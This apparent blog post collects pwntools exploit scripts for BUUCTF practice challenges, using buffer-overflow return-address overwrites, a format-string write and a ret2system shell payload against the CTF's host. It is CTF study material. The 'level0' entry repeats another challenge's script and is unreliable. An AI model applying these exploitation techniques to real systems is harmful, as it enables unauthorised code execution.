PWN

BUUCTF PWN Exp

Posted by Leo on 2023-11-29
Estimated Reading Time 2 Minutes
Words 496 In Total

test_your_nc

1
2
3
4
5
6
7
#!/usr/bin/env python
from pwn import *

# sh=remote('node4.buuoj.cn', 25291)
sh = process('./test')
context.arch = 'amd64'
sh.interactive()

rip

1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/env python
from pwn import *

# sh=remote('node4.buuoj.cn', 25291)
sh = process('./pwn1')
context.arch = 'amd64'

ret_addr = 0x000000000040118A
payload = b'a'*(0x10+8-1) + p64(ret_addr) 
sh.sendline(payload)
sh.interactive()

warmup_csaw_2016

1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/env python
from pwn import *

# sh=remote('node4.buuoj.cn', 25291)
sh = process('./warmup_csaw_2016')
context.arch = 'amd64'

ret_addr = 0x0000000000400611 
payload = b'a'*(0x40+8) + p64(ret_addr) 
sh.sendline(payload)
sh.interactive()

ciscn_2019_n_1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#!/usr/bin/env python
from pwn import *

sh=remote('node4.buuoj.cn', 26378)
# sh = process('./ciscn_2019_n_1')
context.arch = 'amd64'

import struct
def float_to_hex_bytes(f):
    # 将浮点数打包成单精度浮点数的字节序列
    b = struct.pack('f', f)
    # 将字节序列转换成十六进制字符串
    hex_str = b.hex()
    return hex_str
ans = 11.28125
ans = float_to_hex_bytes(ans)
ans = 0x41348000
payload = b'a'*0x2c + p64(ans) 
sh.sendline(payload)
sh.interactive()

pwn1_sctf_2016

1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/env python
from pwn import *

sh=remote('node4.buuoj.cn', 29648)
# sh = process('./pwn1_sctf_2016')

ret_addr = 0x08048F13

payload = b'I'*20 + b'a'*4 + p32(ret_addr) 
sh.sendline(payload)
sh.interactive()

level0

1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/env python
from pwn import *

# sh=remote('node4.buuoj.cn', 29648)
sh = process('./pwn1_sctf_2016')

ret_addr = 0x08048F13

payload = b'I'*20 + b'a'*4 + p32(ret_addr) 
sh.sendline(payload)
sh.interactive()

[第五空间2019 决赛]PWN5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/usr/bin/env python
from pwn import *

sh=remote('node4.buuoj.cn', 27050)
context.arch = 'i386'

bssaddr = 0x804C044
# payload = p32(bssaddr) +p32(bssaddr+1) +p32(bssaddr+2) +p32(bssaddr+3)+ b'%10$n%11$n%12$n%13$n'
# payload = p32(0x0804c044) + b'%10$n'
payload = b'MMM%12$n' + p32(0x0804c044)
print(payload)
sh.recvuntil('name:')
sh.sendline(payload)
sh.recvuntil('passwd')
# sh.sendline(str(0x10101010))
# sh.sendline('4')
sh.sendline('3')
sh.interactive()

jarvisoj_level2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/env python
from pwn import *

sh=remote('node4.buuoj.cn', 29765)
context.arch = 'i386'
elf = ELF('./level2')

sh_addr = 0x0804A024
system_addr = 0x08048320
# system_addr = elf.symbols['system']
payload = b'a'*(0x88+4) + p32(system_addr) + b'aaaa' + p32(sh_addr)

sh.sendline(payload)
sh.interactive()

ciscn_2019_n_8

1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/env python
from pwn import *
# p = remote("node3.buuoj.cn",29772)
p = process('./ciscn_2019_n_8')

# payload = (b'a'*(13*4) + p64(17))
# payload = (b'a'*(13*4) + p32(17) + p32(0))
# payload = p32(17)*14
payload = p32(17)*14 + p32(0)
p.sendline(payload)
p.interactive()

本着互联网开源的性质,欢迎分享这篇文章,以帮助到更多的人,谢谢!

FRIENDS
ESC